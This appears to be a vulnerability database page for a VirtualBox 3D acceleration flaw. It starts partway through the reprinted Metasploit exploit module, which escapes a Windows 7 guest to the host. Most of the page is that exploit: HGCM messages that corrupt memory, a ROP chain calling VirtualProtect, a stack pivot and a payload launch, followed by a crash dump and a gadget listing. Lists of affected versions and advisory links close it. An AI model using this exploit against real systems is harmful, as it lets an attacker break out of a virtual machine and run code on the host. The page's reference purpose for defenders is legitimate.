[SHCRGL_CPARMS_SET_VERSION].pack("V") msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V") msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) result end def trigger(buff_addr, buff_length) msg = "\x00" * CALL_EA_MSG_SIZE msg[4, 4] = [@client_id].pack("V") # u32ClientID msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V") msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V") msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") msg[20, 4] = [@client_id].pack("V") # u32ClientID msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V") msg[32, 4] = [buff_length].pack("V") # size_of(buf) msg[36, 4] = [buff_addr].pack("V") # (buf) result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) result end def stack_adjustment pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00" # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB pivot << "\x89\xc4" # mov esp, eax # Store stack bottom in esp pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # Plus a little offset... pivot end def target_virtualbox_436_win7_64(message_id) opcodes = [0xFF, 0xea, 0x02, 0xf7] opcodes_hdr = [ 0x77474c01, # type CR_MESSAGE_OPCODES 0x8899, # conn_id opcodes.length # numOpcodes ] if message_id == 2 # Message used to achieve Code execution # See at the end of the module for a better description of the ROP Chain, # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php # All gadgets from VBoxREM.dll opcodes_data = [0x8, 0x30, 0x331].pack("V*") opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret opcodes_data << [112].pack("Q<") # RDX opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect) opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp opcodes_data << Rex::Text.pattern_create(80) opcodes_data << [0].pack("Q<") # 1st arg (lpAddress) # chain will store stack address here opcodes_data << Rex::Text.pattern_create(104 - 80 - 8) opcodes_data << [0x2000].pack("Q<") # 2nd arg (dwSize) opcodes_data << Rex::Text.pattern_create(140 - 104 - 8) opcodes_data << [0x40].pack("V") # 3rd arg (flNewProtect) opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64) opcodes_data << [0x6A70BB20].pack("V") # ptr to jmp VirtualProtect instr. opcodes_data << "A" * 8 opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9 opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10 opcodes_data << "\xe9\x5b\x02\x00\x00" # jmp $+608 opcodes_data << "A" * (624 - 24 - 5) opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot opcodes_data << stack_adjustment opcodes_data << payload.encoded opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length) else # Message used to corrupt head_spu # 0x2a9 => offset to head_spu in VBoxSharedCrOpenGL.dll .data # 8196 => On my tests, this data size allows to keep the memory # not reused until the second packet arrives. The second packet, # of course, must have 8196 bytes length too. So this memory is # reused and code execution can be accomplished. opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*") opcodes_data << "B" * (8196 - opcodes_data.length) end msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data msg end def send_opcodes_msg(process, message_id) msg = self.send(target[:messages], message_id) mem = process.memory.allocate(msg.length + (msg.length % 1024)) process.memory.write(mem, msg) trigger(mem, msg.length) end def check handle = open_device if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) Exploit::CheckCode::Detected end def exploit unless self.respond_to?(target[:messages]) print_error("Invalid target specified: no messages callback function defined") return end print_status("Opening device...") @handle = open_device if @handle.nil? fail_with(Failure::NoTarget, "#{DEVICE} device not found") else print_good("#{DEVICE} found, exploiting...") end print_status("Connecting to the service...") @client_id = connect if @client_id.nil? fail_with(Failure::Unknown, "Connect operation failed") end print_good("Client ID #{@client_id}") print_status("Calling SET_VERSION...") result = set_version if result.nil? fail_with(Failure::Unknown, "Failed to SET_VERSION") end this_pid = session.sys.process.getpid print_status("Calling SET_PID...") result = set_pid(this_pid) if result.nil? fail_with(Failure::Unknown, "Failed to SET_PID") end this_proc = session.sys.process.open print_status("Sending First 0xEA Opcode Message to control head_spu...") result = send_opcodes_msg(this_proc, 1) if result.nil? fail_with(Failure::Unknown, "Failed to control heap_spu...") end print_status("Sending Second 0xEA Opcode Message to execute payload...") @old_timeout = session.response_timeout session.response_timeout = 5 begin send_opcodes_msg(this_proc, 2) rescue Rex::TimeoutError vprint_status("Expected timeout in case of successful exploitation") end end def cleanup unless @old_timeout.nil? session.response_timeout = @old_timeout end if session_created? # Unless we add CoE there is nothing to do return end unless @client_id.nil? print_status("Disconnecting from the service...") disconnect end unless @handle.nil? print_status("Closing the device...") session.railgun.kernel32.CloseHandle(@handle) end end end =begin * VirtualBox 4.3.6 / Windows 7 SP1 64 bits Crash after second message: 0:013> dd rax 00000000`0e99bd44 41306141 61413161 33614132 41346141 00000000`0e99bd54 61413561 37614136 41386141 62413961 00000000`0e99bd64 31624130 41326241 62413362 35624134 00000000`0e99bd74 41366241 62413762 39624138 41306341 00000000`0e99bd84 63413163 33634132 41346341 63413563 00000000`0e99bd94 37634136 41386341 64413963 31644130 00000000`0e99bda4 41326441 64413364 35644134 41366441 00000000`0e99bdb4 64413764 39644138 41306541 65413165 0:013> r rax=000000000e99bd44 rbx=0000000000000001 rcx=000007fef131e8ba rdx=000000006a72fb62 rsi=000000000e5531f0 rdi=0000000000000000 rip=000007fef12797f8 rsp=0000000004b5f620 rbp=0000000041424344 << already controlled... r8=0000000000000001 r9=00000000000005c0 r10=0000000000000000 r11=0000000000000246 r12=0000000000000000 r13=00000000ffffffff r14=000007fef1f90000 r15=0000000002f6e280 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 VBoxSharedCrOpenGL!crServerAddNewClient+0x208: 000007fe`f12797f8 ff9070030000 call qword ptr [rax+370h] ds:00000000`0e99c0b4=7641397541387541 Gadget 1: Stack Pivot # 0x6a682a2a xchg eax,esp 94 ret c3 Gadget 2: Control RDX value # 0x6a68599a pop rdx 5a xor ecx,dword ptr [rax] 33 08 add cl,cl 00 c9 movzx eax,al 0f b6 c0 ret c3 Gadget 3: Store ptr to RSP in RAX # 0x6a70a560 lea rax,[rsp+8] 48 8d 44 24 08 ret c3 Gadget 4: Store ptr to RSP + RDX offset (controlled) in RAX # 0x6a692b1c lea rax,[rdx+rax] 48 8d 04 02 ret c3 Gadget 5: Write Stack Address (EAX) to the stack # 0x6a6931d6 add dword ptr [rax],eax 01 00 add cl,cl 00 c9 ret c3 Gadget 6: Control R12 # 0x6a68124e pop r12 ret Gadget 7: Recover VirtualProtect arguments from the stack and call it (ebp) # 0x6a70927d mov r9,r12 4d 89 e1 mov r8d,dword ptr [rsp+8Ch] 44 8b 84 24 8c 00 00 00 mov rdx,qword ptr [rsp+68h] 48 8b 54 24 68 mov rcx,qword ptr [rsp+50h] 48 8b 4c 24 50 call rbp ff d5 Gadget 8: After VirtualProtect, get pointer to the shellcode in the # 0x6a70a560 lea rax, [rsp+8] 48 8d 44 24 08 ret c3 Gadget 9: Push the pointer and provide control to shellcode # 0x6a6c9d3d push rax 50 adc cl,ch 10 e9 ret c3 =end

Products Mentioned

Configuraton 0

Oracle>>Vm_virtualbox >> Version 4.2.0

Oracle>>Vm_virtualbox >> Version 4.2.2

Oracle>>Vm_virtualbox >> Version 4.2.4

Oracle>>Vm_virtualbox >> Version 4.2.6

Oracle>>Vm_virtualbox >> Version 4.2.8

Oracle>>Vm_virtualbox >> Version 4.2.10

Oracle>>Vm_virtualbox >> Version 4.2.12

Oracle>>Vm_virtualbox >> Version 4.2.14

Oracle>>Vm_virtualbox >> Version 4.2.16

Oracle>>Vm_virtualbox >> Version 4.2.18

Oracle>>Vm_virtualbox >> Version 4.2.20

Oracle>>Vm_virtualbox >> Version 4.3.0

Oracle>>Vm_virtualbox >> Version 4.3.2

Oracle>>Vm_virtualbox >> Version 4.3.4

Oracle>>Vm_virtualbox >> Version 4.3.6

Références

http://www.exploit-db.com/exploits/32208
Tags : exploit, x_refsource_EXPLOIT-DB
https://security.gentoo.org/glsa/201612-27
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/57384
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2014/dsa-2904
Tags : vendor-advisory, x_refsource_DEBIAN
http://seclists.org/fulldisclosure/2014/Mar/95
Tags : mailing-list, x_refsource_FULLDISC